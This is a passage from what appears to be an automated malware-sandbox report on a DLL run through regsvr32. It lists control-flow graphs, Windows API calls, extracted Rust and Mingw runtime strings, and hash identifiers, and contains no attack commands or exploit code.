5607->5614 5613->5614 5616 7ffd348e8297-7ffd348e82a0 call 7ffd348efe90 5614->5616 5617 7ffd348e82a5-7ffd348e831e call 7ffd348e7180 LoadLibraryA call 7ffd348e7180 GetProcAddress 5614->5617 5616->5617 5623 7ffd348e8320-7ffd348e8329 call 7ffd348efe90 5617->5623 5624 7ffd348e832e-7ffd348e8336 5617->5624 5623->5624 5626 7ffd348e8338-7ffd348e8341 call 7ffd348efe90 5624->5626 5627 7ffd348e8346-7ffd348e8384 5624->5627 5626->5627 5628 7ffd348e83b8-7ffd348e83c0 5627->5628 5629 7ffd348e8386-7ffd348e8389 5627->5629 5628->5556 5632 7ffd348e83c2-7ffd348e83c6 5628->5632 5629->5628 5631 7ffd348e838b-7ffd348e838e 5629->5631 5631->5628 5633 7ffd348e8390-7ffd348e83a5 CreateEventW 5631->5633 5632->5556 5634 7ffd348e83c8-7ffd348e83d8 call 7ffd348efe90 5632->5634 5633->5628 5635 7ffd348e83a7-7ffd348e83b6 WaitForSingleObject 5633->5635 5634->5556 5635->5628 5637 7ffd348e83da-7ffd348e83ef call 7ffd34992c8c call 7ffd34992a7c call 7ffd348e5430 5635->5637 5637->5556
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$LibraryLoad$HandleModule$CreateEventObjectSingleWait
                                                                              • String ID:
                                                                              • API String ID: 229642238-0
                                                                              • Opcode ID: cbe8d2b4c710e75cb952cc5a011b0587832e0300ffe78bfd316ff2622f8d4b42
                                                                              • Instruction ID: ae1e5aff873be6bef264347a409fe0d5f4ce057c2b1bc2d82ff5a1390bcf0a55
                                                                              • Opcode Fuzzy Hash: cbe8d2b4c710e75cb952cc5a011b0587832e0300ffe78bfd316ff2622f8d4b42
                                                                              • Instruction Fuzzy Hash: 1EC19422B0864740FE589B15E4A07BB6361BF877C4F484539EF4C8B69ADF3EE184A750
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorObjectSingleStatusWaitmemcpy
                                                                              • String ID: -pty$cygw$msys$win-
                                                                              • API String ID: 2933437151-1440016460
                                                                              • Opcode ID: a0a584c26ef591ae365389cd6e052965770c83e6c2d251fc1fbc668fc0086a67
                                                                              • Instruction ID: 143c6a287a9452d4d820241c76c3e3055c775690dbc94538236b411b5f1d785b
                                                                              • Opcode Fuzzy Hash: a0a584c26ef591ae365389cd6e052965770c83e6c2d251fc1fbc668fc0086a67
                                                                              • Instruction Fuzzy Hash: EF02CF62B08B9189FB60CB61D8B43F92790EB46788F548139EB598BBC9DF3CD585D310
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: <unnamed>$Box<dyn Any>aborting due to panic at $cannot access a Thread Local Storage value during or after destructionstd\src\thread\local.rs$main
                                                                              • API String ID: 0-682990651
                                                                              • Opcode ID: 78377a369185fa01d944118eba979aeb66dce1f88b45b16ea541a900c20b631a
                                                                              • Instruction ID: 77b53aa1498d89fd471249f6dc28f7769c36f9cb883f29df83a6bb7bc2f4e550
                                                                              • Opcode Fuzzy Hash: 78377a369185fa01d944118eba979aeb66dce1f88b45b16ea541a900c20b631a
                                                                              • Instruction Fuzzy Hash: EFB1A222B0974285FBA58F20D4B03B927A0AF57788F54443ADB4D877A9DF3CE815E360
                                                                              APIs
                                                                              • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00007FFD3495177F,?,?,?,?), ref: 00007FFD34947E91
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: HeapProcess
                                                                              • String ID:
                                                                              • API String ID: 54951025-0
                                                                              • Opcode ID: 35daf55ec40e88a7f14c1980a3476fe24fbf625f42105af5a2bf6ab6c851a237
                                                                              • Instruction ID: ba562eadca9f426b9fb723603912543e207c721015b423ae90c815b27affa59c
                                                                              • Opcode Fuzzy Hash: 35daf55ec40e88a7f14c1980a3476fe24fbf625f42105af5a2bf6ab6c851a237
                                                                              • Instruction Fuzzy Hash: D0F0E902F0A505CDFAA9C646A8A45B5A1C50F8ABD0E2C447CCF0CC6798ED2CEDC2B620
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$FullNamePath
                                                                              • String ID: \\?\$\\?\UNC\
                                                                              • API String ID: 2482867836-3019864461
                                                                              • Opcode ID: 16c8126cd5f11e35156f39b597157324df7a0588c49aa9e737710373be7806d5
                                                                              • Instruction ID: 6bbb4185bd9f2731940fd7821500f12aa65c8060d531a0ba79a6e61f6695e468
                                                                              • Opcode Fuzzy Hash: 16c8126cd5f11e35156f39b597157324df7a0588c49aa9e737710373be7806d5
                                                                              • Instruction Fuzzy Hash: E012B562B0C69185EB74CB25D4A47B92399FB06B98F408139DB1D8B7CDDF3CE581A720

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 5855 7ffd349477b0-7ffd34947825 5856 7ffd34947850-7ffd34947859 5855->5856 5857 7ffd34947827 5855->5857 5858 7ffd3494788e-7ffd349478b4 5856->5858 5859 7ffd3494785b-7ffd34947887 call 7ffd3490d140 5856->5859 5860 7ffd3494783f-7ffd3494784b 5857->5860 5861 7ffd349478b7-7ffd349478d7 SetLastError GetFullPathNameW 5858->5861 5859->5858 5860->5861 5864 7ffd349478e6-7ffd349478ec 5861->5864 5865 7ffd349478d9-7ffd349478e0 GetLastError 5861->5865 5867 7ffd34947830 5864->5867 5868 7ffd349478f2-7ffd349478fa GetLastError 5864->5868 5865->5864 5866 7ffd349479aa-7ffd349479d9 GetLastError 5865->5866 5871 7ffd349479f0-7ffd349479fd 5866->5871 5872 7ffd349479db-7ffd349479eb call 7ffd348efe90 5866->5872 5869 7ffd34947924-7ffd34947927 5867->5869 5870 7ffd34947836-7ffd3494783d 5867->5870 5873 7ffd34947900-7ffd34947919 5868->5873 5874 7ffd34947acc-7ffd34947ae4 call 7ffd3497c350 5868->5874 5880 7ffd3494792d-7ffd34947947 5869->5880 5881 7ffd34947ae6-7ffd34947afb call 7ffd34982c70 5869->5881 5870->5856 5870->5860 5876 7ffd349479ff 5871->5876 5877 7ffd34947a11-7ffd34947a25 5871->5877 5872->5871 5873->5860 5878 7ffd3494791f 5873->5878 5892 7ffd34947b21-7ffd34947b30 5874->5892 5882 7ffd34947a03-7ffd34947a0c call 7ffd348efe90 5876->5882 5878->5856 5884 7ffd34947afd-7ffd34947b0e call 7ffd34982ce0 5880->5884 5885 7ffd3494794d-7ffd34947950 5880->5885 5881->5892 5882->5877 5884->5892 5887 7ffd34947b10-7ffd34947b1c call 7ffd34982c70 5885->5887 5888 7ffd34947956-7ffd3494795d 5885->5888 5887->5892 5893 7ffd3494795f-7ffd34947977 memcmp 5888->5893 5894 7ffd3494797d-7ffd34947980 5888->5894 5897 7ffd34947b32-7ffd34947b47 call 7ffd348efe90 5892->5897 5898 7ffd34947b4c-7ffd34947b4f 5892->5898 5893->5894 5899 7ffd34947a26-7ffd34947a28 5893->5899 5900 7ffd34947983-7ffd3494799f 5894->5900 5897->5898 5902 7ffd34947b51-7ffd34947b53 5898->5902 5903 7ffd34947b55-7ffd34947b6b call 7ffd348efe90 5898->5903 5908 7ffd34947a5b 5899->5908 5909 7ffd34947a2a-7ffd34947a47 call 7ffd348efe80 5899->5909 5900->5877 5904 7ffd349479a1-7ffd349479a8 5900->5904 5906 7ffd34947b75-7ffd34947b7f 5902->5906 5903->5906 5904->5882 5910 7ffd34947b81-7ffd34947b91 call 7ffd348efe90 5906->5910 5911 7ffd34947b96-7ffd34947b99 5906->5911 5912 7ffd34947a60-7ffd34947aad memcpy call 7ffd3490ce30 5908->5912 5909->5912 5920 7ffd34947a49-7ffd34947a56 call 7ffd3496f690 5909->5920 5910->5911 5917 7ffd34947b9b-7ffd34947ba8 5911->5917 5918 7ffd34947baa-7ffd34947bad call 7ffd34993140 5911->5918 5912->5900 5926 7ffd34947ab3-7ffd34947ac7 call 7ffd348efe90 5912->5926 5917->5918 5921 7ffd34947bb2-7ffd34947c01 call 7ffd348efe90 call 7ffd34993140 GetModuleHandleA 5917->5921 5918->5921 5920->5892 5933 7ffd34947c03-7ffd34947c20 GetProcAddress 5921->5933 5934 7ffd34947c22 5921->5934 5926->5900 5935 7ffd34947c29-7ffd34947c3c 5933->5935 5934->5935
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$AddressFullHandleModuleNamePathProcmemcmpmemcpy
                                                                              • String ID: SetThreadDescription$kernel32
                                                                              • API String ID: 1783792165-1950310818
                                                                              • Opcode ID: 1a83bace348c22229cc54a374f331dfe9cc19c44e881e44416fe43297c8e06ad
                                                                              • Instruction ID: 4e3e7e7d81b2052f9880b596306264841cbe179f18054fce1be198b949fa98d6
                                                                              • Opcode Fuzzy Hash: 1a83bace348c22229cc54a374f331dfe9cc19c44e881e44416fe43297c8e06ad
                                                                              • Instruction Fuzzy Hash: 99B1BF61B0878685EA65DF61DCA43B96355BF46BC8F544479DF0C8B78ADE3CE240A320

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00000000,00000000,00007FFD349938D1,?,?,?,?,?,?,00007FFD34A237A8,00000000), ref: 00007FFD34993727
                                                                              • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00000000,00000000,00007FFD349938D1,?,?,?,?,?,?,00007FFD34A237A8,00000000), ref: 00007FFD34993750
                                                                                • Part of subcall function 00007FFD34994310: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,00007FFD34993763,?,?,?,?,00000000,00000000,00007FFD349938D1), ref: 00007FFD34994327
                                                                              • VirtualQuery.KERNEL32 ref: 00007FFD3499381B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: __acrt_iob_func$QueryVirtual__stdio_common_vfprintf
                                                                              • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                                                                              • API String ID: 2227559371-1534286854
                                                                              • Opcode ID: 15544ac378e92dabfd2aab9f6c8cab7c6cfad9d0d9f0b9f1bf9b38bca65307de
                                                                              • Instruction ID: 085abde12faa68248b087f0a9aafe5bd3438365c09a9c0e46d392544365aa0f9
                                                                              • Opcode Fuzzy Hash: 15544ac378e92dabfd2aab9f6c8cab7c6cfad9d0d9f0b9f1bf9b38bca65307de
                                                                              • Instruction Fuzzy Hash: BD419276B0874682EB209F11E4A06A97760FF8EB94F544138DB4C877A8EE3CE441E750
                                                                              APIs
                                                                              Strings
                                                                              • assertion failed: new_left_len <= CAPACITY, xrefs: 00007FFD3490B953
                                                                              • assertion failed: match track_edge_idx { LeftOrRight::Left(idx) => idx <= old_left_len, LeftOrRight::Right(idx) => idx <= right_len,}, xrefs: 00007FFD3490BF23
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: memcpy
                                                                              • String ID: assertion failed: match track_edge_idx { LeftOrRight::Left(idx) => idx <= old_left_len, LeftOrRight::Right(idx) => idx <= right_len,}$assertion failed: new_left_len <= CAPACITY
                                                                              • API String ID: 3510742995-2079967719
                                                                              • Opcode ID: 9a287294992927b3a5c016f68b0b6dcbad2b06f82bba50acd24327b1be9101b2
                                                                              • Instruction ID: 4fb76a1db808c8b8b7e775407cda2e29882ada0b5756677dde30e9660e0c556b
                                                                              • Opcode Fuzzy Hash: 9a287294992927b3a5c016f68b0b6dcbad2b06f82bba50acd24327b1be9101b2
                                                                              • Instruction Fuzzy Hash: 4A42C032A04BC585E721CF24E8903E933A8FB59788F54823ADF8D5B759DF399295D310
                                                                              APIs
                                                                              Strings
                                                                              • environment variable not foundenvironment variable was not valid unicode: , xrefs: 00007FFD3491F7FD
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$EnvironmentVariable
                                                                              • String ID: environment variable not foundenvironment variable was not valid unicode:
                                                                              • API String ID: 2691138088-3632183283
                                                                              • Opcode ID: 8b2c3f45b91e5426d2ad28b9643c5ef91532c62457ea07745227bb25dff89eca
                                                                              • Instruction ID: 2a4d65dcfca34d10bb59f670fb6489b74fc393f4068f76de28154a73e7aba335
                                                                              • Opcode Fuzzy Hash: 8b2c3f45b91e5426d2ad28b9643c5ef91532c62457ea07745227bb25dff89eca
                                                                              • Instruction Fuzzy Hash: 04B18062B04A8685EB248F61D8A43F92365BB4ABC8F444439CF1C9B79EDE3DD281D310
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$FullNamePathmemcmpmemcpy
                                                                              • String ID:
                                                                              • API String ID: 2015650653-0
                                                                              • Opcode ID: 15aa337a8fbd30a7076cd73229830dd6d0c25f24f88db4a8c680c2d4aec55e6d
                                                                              • Instruction ID: 3af9c8874685502d1f021f4c9a9f27f993bf1c67d2016482aff4c13cbae56308
                                                                              • Opcode Fuzzy Hash: 15aa337a8fbd30a7076cd73229830dd6d0c25f24f88db4a8c680c2d4aec55e6d
                                                                              • Instruction Fuzzy Hash: EDA1A066B08B8645EB75DF25D8A43B96356BB46BC8F54443ADF0C8B78ADE3CD240A310
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$CurrentDirectoryFileModuleName
                                                                              • String ID:
                                                                              • API String ID: 1505103792-0
                                                                              • Opcode ID: 4c286df647e8e90423901ad1b03ddedb47573547d27864f6eb1e105570692942
                                                                              • Instruction ID: 1594be8102b264742bc7e8b07059a1a069b22254bf139eff9fd9216e14bc2d49
                                                                              • Opcode Fuzzy Hash: 4c286df647e8e90423901ad1b03ddedb47573547d27864f6eb1e105570692942
                                                                              • Instruction Fuzzy Hash: A571C062B0868149FB659F25D8A43FD2365BB47BD8F044539EF1C9B68EDF2CA2809310
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: abort$CaptureContextExceptionRaiseUnwind
                                                                              • String ID: CCG
                                                                              • API String ID: 4122134289-1584390748
                                                                              • Opcode ID: c57f312fce00cbdee65f0a8f3e82514c592f52b07bb3f275f57e4aff3089ea9d
                                                                              • Instruction ID: 334623b3f95a9a07567b36a008bf3dc3813ab2a7fa3bf354df7573bbeaa19497
                                                                              • Opcode Fuzzy Hash: c57f312fce00cbdee65f0a8f3e82514c592f52b07bb3f275f57e4aff3089ea9d
                                                                              • Instruction Fuzzy Hash: 49313072A08B8586E7209F24E4903A97771FBDD788F505226DB8C53769DF7DD191CB00
                                                                              APIs
                                                                                • Part of subcall function 00007FFD34983DA0: memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,-pty,00000000,00000004,00000003,?,00007FFD34905F1D), ref: 00007FFD34983E1F
                                                                              • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00007FFD348E1FAB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: memcmpmemcpy
                                                                              • String ID: {}
                                                                              • API String ID: 1784268899-102398416
                                                                              • Opcode ID: 460b3c56792f714b2b64b372c89636ddea5141116f8c9640e3532d37db9afe77
                                                                              • Instruction ID: 1da4e4bce550c3d8449fe9412eb37de7ec39dafe2f550644826b088761ee6e1a
